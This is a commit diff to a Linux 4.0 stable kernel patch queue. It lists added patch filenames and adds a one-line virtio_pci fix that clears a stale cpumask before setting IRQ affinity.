+ozwpan-divide-by-zero-leading-to-panic.patch +ozwpan-unchecked-signed-subtraction-leads-to-dos.patch +pata_octeon_cf-fix-broken-build.patch +arm-dts-am335x-boneblack-disable-rtc-only-sleep-to-avoid-hardware-damage.patch +drm-amdkfd-fix-topology-bug-with-capability-attr.patch +drm-radeon-use-proper-acr-regisiter-for-dce3.2.patch +drm-i915-hsw-fix-workaround-for-server-aux-channel-clock-divisor.patch +drm-i915-don-t-skip-request-retirement-if-the-active-list-is-empty.patch +drm-i915-fix-ddc-probe-for-passive-adapters.patch +drm-radeon-fix-freeze-for-laptop-with-turks-thames-gpu.patch +revert-drm-radeon-don-t-share-plls-if-monitors-differ-in-audio-support.patch +revert-drm-radeon-adjust-pll-when-audio-is-not-enabled.patch +drm-radeon-make-sure-radeon_vm_bo_set_addr-always-unreserves-the-bo.patch +serial-imx-fix-dma-handling-for-idle-condition-aborts.patch +of-dynamic-fix-test-for-ppc_pseries.patch +virtio_pci-clear-stale-cpumask-when-setting-irq-affinity.patch +ata-ahci_mvebu-fix-wrongly-set-base-address-for-the-mbus-window-setting.patch +bus-mvebu-mbus-do-not-set-win_ctrl_syncbarrier-on-non-io-coherent-platforms.patch +revert-bus-mvebu-mbus-make-sure-sdram-cs-for-dma-don-t-overlap-the-mbus-bridge-window.patch +arm64-dts-mt8173-evb-fix-model-name.patch +mm-memory_hotplug.c-set-zone-wait_table-to-null-after-freeing-it.patch +md-close-race-when-setting-action-to-idle.patch +md-don-t-return-0-from-array_state_store.patch +sched-numa-do-not-hint-for-numa-balancing-on-vm_mixedmap-mappings.patch +blk-mq-free-hctx-ctxs-in-queue-s-release-handler.patch +cfg80211-wext-clear-sinfo-struct-before-calling-driver.patch +irqchip-sunxi-nmi-fix-off-by-one-error-in-irq-iterator.patch diff --git a/queue-4.0/virtio_pci-clear-stale-cpumask-when-setting-irq-affinity.patch b/queue-4.0/virtio_pci-clear-stale-cpumask-when-setting-irq-affinity.patch new file mode 100644 index 00000000000..03271044f19 --- /dev/null +++ b/queue-4.0/virtio_pci-clear-stale-cpumask-when-setting-irq-affinity.patch @@ -0,0 +1,31 @@ +From 210d150e1f5da506875e376422ba31ead2d49621 Mon Sep 17 00:00:00 2001 +From: Jiang Liu +Date: Thu, 4 Jun 2015 16:41:44 +0800 +Subject: virtio_pci: Clear stale cpumask when setting irq affinity + +From: Jiang Liu + +commit 210d150e1f5da506875e376422ba31ead2d49621 upstream. + +The cpumask vp_dev->msix_affinity_masks[info->msix_vector] may contain +staled information when vp_set_vq_affinity() gets called, so clear it +before setting the new cpu bit mask. + +Signed-off-by: Jiang Liu +Signed-off-by: Michael S. Tsirkin +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/virtio/virtio_pci_common.c | 1 + + 1 file changed, 1 insertion(+) + +--- a/drivers/virtio/virtio_pci_common.c ++++ b/drivers/virtio/virtio_pci_common.c +@@ -423,6 +423,7 @@ int vp_set_vq_affinity(struct virtqueue + if (cpu == -1) + irq_set_affinity_hint(irq, NULL); + else { ++ cpumask_clear(mask); + cpumask_set_cpu(cpu, mask); + irq_set_affinity_hint(irq, mask); + }